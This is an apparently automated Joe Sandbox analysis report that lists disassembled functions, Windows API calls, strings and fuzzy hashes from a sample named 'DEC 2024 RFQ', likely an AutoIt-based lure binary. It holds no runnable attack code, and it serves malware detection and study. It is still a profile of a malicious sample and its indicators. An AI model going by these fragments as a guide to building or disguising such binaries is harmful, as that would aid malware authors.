                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0005C912
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 464785882-4108050209
                                                                                                                      • Opcode ID: 41d8d4ccd571d7278fa01f39f47a24e1411788203c677426cd7b692b5800aba0
                                                                                                                      • Instruction ID: 9e758af856008e91de67ae4732913668dc77afdd3da210e509bf325050dbfa8f
                                                                                                                      • Opcode Fuzzy Hash: 41d8d4ccd571d7278fa01f39f47a24e1411788203c677426cd7b692b5800aba0
                                                                                                                      • Instruction Fuzzy Hash: B712AD30604611AFEB65CF64D884FAAB7E5FF09311F644569F885CB262C731E886CB91
                                                                                                                      Function 000974AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 000974DE
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0009759D
                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 000975DB
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 000975ED
                                                                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00097633
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0009763F
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00097683
                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00097692
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 000976A2
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 000976A6
                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 000976B6
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000976BF
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 000976C8
                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000976F4
                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0009770B
                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00097746
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0009775A
                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0009776B
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0009779B
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 000977A6
                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000977B1
                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 000977BB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                      • Opcode ID: 68206ac0bac2c628b694699e4032ebc38e757df9307ca98debf148df8d9e9949
                                                                                                                      • Instruction ID: 192e448e9971e152f5a00f46e668161e93cd2456b8e8eb2bf68e8fca37429108
                                                                                                                      • Opcode Fuzzy Hash: 68206ac0bac2c628b694699e4032ebc38e757df9307ca98debf148df8d9e9949
                                                                                                                      • Instruction Fuzzy Hash: 35A19071A00615BFEB14DBA4DC4AFBE7BB9EB05715F004118FA14AB2E1C774AD00CB64
                                                                                                                      Function 0008AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0008AD1E
                                                                                                                      • GetDriveTypeW.KERNEL32(?,000AFAC0,?,\\.\,000AF910), ref: 0008ADFB
                                                                                                                      • SetErrorMode.KERNEL32(00000000,000AFAC0,?,\\.\,000AF910), ref: 0008AF59
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                      • Opcode ID: 824735435fa31637ca9d51b2829d79da38fa7f4c8d25e06e8e1ff536770bd9d3
                                                                                                                      • Instruction ID: 73beef95f2ee32224dd5ad163c1a348b2b24d34215f5bcaa68848364cc3b0ae5
                                                                                                                      • Opcode Fuzzy Hash: 824735435fa31637ca9d51b2829d79da38fa7f4c8d25e06e8e1ff536770bd9d3
                                                                                                                      • Instruction Fuzzy Hash: 5D51A6B0744305ABAB50FB94C942DBD73A0FB4A710B208467E687ABB93DB709D41DB53
                                                                                                                      Function 000268DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                      • API String ID: 1038674560-86951937
                                                                                                                      • Opcode ID: f59187f97923196b67e516548a845cf7c7b779f720b973be1e54002043791696
                                                                                                                      • Instruction ID: e54989272d022d33a7bff3adb214c612d8564084ebd1a52b305afcca771e8f19
                                                                                                                      • Opcode Fuzzy Hash: f59187f97923196b67e516548a845cf7c7b779f720b973be1e54002043791696
                                                                                                                      • Instruction Fuzzy Hash: 8C8106B1600225AACB25AA60EC86FFF77ACAF05700F045035FD45AB193EB72DE45C6A5
                                                                                                                      Function 000AA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000012), ref: 000AA903
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 000AA907
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000AA91D
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 000AA928
                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 000AA92D
                                                                                                                      • GetSysColor.USER32(00000011), ref: 000AA945
                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 000AA953
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 000AA964
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 000AA96D
                                                                                                                      • SelectObject.GDI32(?,?), ref: 000AA97A
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 000AA999
                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000AA9B0
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 000AA9C5
                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000AA9ED
                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000AAA14
                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 000AAA32
                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 000AAA3D
                                                                                                                      • GetSysColor.USER32(00000011), ref: 000AAA4B
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 000AAA53
                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 000AAA67
                                                                                                                      • SelectObject.GDI32(?,000AA5FA), ref: 000AAA7E
                                                                                                                      • DeleteObject.GDI32(?), ref: 000AAA89
                                                                                                                      • SelectObject.GDI32(?,?), ref: 000AAA8F
                                                                                                                      • DeleteObject.GDI32(?), ref: 000AAA94
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 000AAA9A
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 000AAAA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1996641542-0
                                                                                                                      • Opcode ID: d29831a8cfab293f75336766291ea7318ec2c2313b443679776e4148e52ae27e
                                                                                                                      • Instruction ID: 4938501f5633c3c3da3710f8d11d5259dd51cc7b748cff8ad273f46bda1db499
                                                                                                                      • Opcode Fuzzy Hash: d29831a8cfab293f75336766291ea7318ec2c2313b443679776e4148e52ae27e
                                                                                                                      • Instruction Fuzzy Hash: AC512C71900609FFEB119FE4DC48EEE7BB9EB0A320F114625FA11AB2A1D7759940DB90
                                                                                                                      Function 000A89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 000A8AC1
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000A8AD2
                                                                                                                      • CharNextW.USER32(0000014E), ref: 000A8B01
                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 000A8B42
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 000A8B58
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000A8B69
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 000A8B86
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 000A8BD8
                                                                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 000A8BEE
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 000A8C1F
                                                                                                                      • _memset.LIBCMT ref: 000A8C44
                                                                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 000A8C8D
                                                                                                                      • _memset.LIBCMT ref: 000A8CEC
                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 000A8D16
                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 000A8D6E
                                                                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 000A8E1B
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 000A8E3D
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000A8E87
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000A8EB4
                                                                                                                      • DrawMenuBar.USER32(?), ref: 000A8EC3
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 000A8EEB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1073566785-4108050209
                                                                                                                      • Opcode ID: d58ee771d42e1b8d4bd063981d52a06a08730bad4a10e60b04c9480f3603b869
                                                                                                                      • Instruction ID: 89242254dfdf3c6c9b50b97ea3a707c3b6b740f24d1b92fa9cfdfd283dc442ca
                                                                                                                      • Opcode Fuzzy Hash: d58ee771d42e1b8d4bd063981d52a06a08730bad4a10e60b04c9480f3603b869
                                                                                                                      • Instruction Fuzzy Hash: 17E17270900219AFEF20DFA0CC84EFE7BB9EF0A710F148166F915AA191DB749980DF61
                                                                                                                      Function 000A488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 000A49CA
                                                                                                                      • GetDesktopWindow.USER32 ref: 000A49DF
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 000A49E6
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000A4A48
                                                                                                                      • DestroyWindow.USER32(?), ref: 000A4A74
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000A4A9D
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000A4ABB
                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 000A4AE1
                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 000A4AF6
                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 000A4B09
                                                                                                                      • IsWindowVisible.USER32(?), ref: 000A4B29
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 000A4B44
                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 000A4B58
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000A4B70
                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 000A4B96
                                                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 000A4BB0
                                                                                                                      • CopyRect.USER32(?,?), ref: 000A4BC7
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 000A4C32
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                      • Opcode ID: 079f047b1f1d3675653a4399e9e6c870d99b579ec7643f2e48fc0898954fc03b
                                                                                                                      • Instruction ID: 81bc5366425745288598365cf36613d63adc537aa197d1c4207b2eea0944c52b
                                                                                                                      • Opcode Fuzzy Hash: 079f047b1f1d3675653a4399e9e6c870d99b579ec7643f2e48fc0898954fc03b
                                                                                                                      • Instruction Fuzzy Hash: 72B19C74604351AFDB44DFA4D844B6BBBE4BF85310F008A1CF5999B291D7B4EC05CB96
                                                                                                                      Function 000227D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000228BC
                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 000228C4
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000228EF
                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 000228F7
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 0002291C
                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00022939
                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00022949
                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0002297C
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00022990
                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 000229AE
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 000229CA
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 000229D5
                                                                                                                        • Part of subcall function 00022344: GetCursorPos.USER32(?), ref: 00022357
                                                                                                                        • Part of subcall function 00022344: ScreenToClient.USER32(000E57B0,?), ref: 00022374
                                                                                                                        • Part of subcall function 00022344: GetAsyncKeyState.USER32(00000001), ref: 00022399
                                                                                                                        • Part of subcall function 00022344: GetAsyncKeyState.USER32(00000002), ref: 000223A7
                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00021256), ref: 000229FC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                      • Opcode ID: 59f2cd6c954abbac3d69098a1766d8fb75b17f685cefeac9f5e8735062fd0057
                                                                                                                      • Instruction ID: ea2b34f477d3d73896060f22ccb0986f85cce1781ed8218e75749ccbcb7f198e
                                                                                                                      • Opcode Fuzzy Hash: 59f2cd6c954abbac3d69098a1766d8fb75b17f685cefeac9f5e8735062fd0057
                                                                                                                      • Instruction Fuzzy Hash: 9AB19171A0061AEFEB14DFA8DD45BAE77B4FB08315F104229FA15A7290DB74D851CB50
                                                                                                                      Function 0007A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0007A47A
                                                                                                                      • __swprintf.LIBCMT ref: 0007A51B
                                                                                                                      • _wcscmp.LIBCMT ref: 0007A52E
                                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0007A583
                                                                                                                      • _wcscmp.LIBCMT ref: 0007A5BF
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0007A5F6
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0007A648
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0007A67E
                                                                                                                      • GetParent.USER32(?), ref: 0007A69C
                                                                                                                      • ScreenToClient.USER32(00000000), ref: 0007A6A3
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0007A71D
                                                                                                                      • _wcscmp.LIBCMT ref: 0007A731
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0007A757
                                                                                                                      • _wcscmp.LIBCMT ref: 0007A76B
                                                                                                                        • Part of subcall function 0004362C: _iswctype.LIBCMT ref: 00043634
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                      • String ID: %s%u
                                                                                                                      • API String ID: 3744389584-679674701
                                                                                                                      • Opcode ID: 5199269cf6b9c3fe6ad2bcaf996724b04d363fc2cee877c6afc749349bba0166
                                                                                                                      • Instruction ID: 12c096b4b7e4a9da30d6d8e0a97f6fbe1ef7aa014b1873fe83ae0c2ddd6a0e31
                                                                                                                      • Opcode Fuzzy Hash: 5199269cf6b9c3fe6ad2bcaf996724b04d363fc2cee877c6afc749349bba0166
                                                                                                                      • Instruction Fuzzy Hash: EEA1CF71704606ABD718DF64C884BAEB7E8FF85314F00C629F99DC2191DB38E945CBA6
                                                                                                                      Function 0007AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0007AF18
                                                                                                                      • _wcscmp.LIBCMT ref: 0007AF29
                                                                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0007AF51
                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0007AF6E
                                                                                                                      • _wcscmp.LIBCMT ref: 0007AF8C
                                                                                                                      • _wcsstr.LIBCMT ref: 0007AF9D
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0007AFD5
                                                                                                                      • _wcscmp.LIBCMT ref: 0007AFE5
                                                                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0007B00C
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0007B055
                                                                                                                      • _wcscmp.LIBCMT ref: 0007B065
                                                                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0007B08D
                                                                                                                      • GetWindowRect.USER32(00000004,?), ref: 0007B0F6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                      • API String ID: 1788623398-1539354611
                                                                                                                      • Opcode ID: 55ceef73116c0c38f6a3f7380eb51ce25a79df576b8cd80e79b29a5f902bc116
                                                                                                                      • Instruction ID: 49a3cf6dc5bd95fe60a7366b16c83f53916e9b8e314bf471e61a05fee7503a95
                                                                                                                      • Opcode Fuzzy Hash: 55ceef73116c0c38f6a3f7380eb51ce25a79df576b8cd80e79b29a5f902bc116
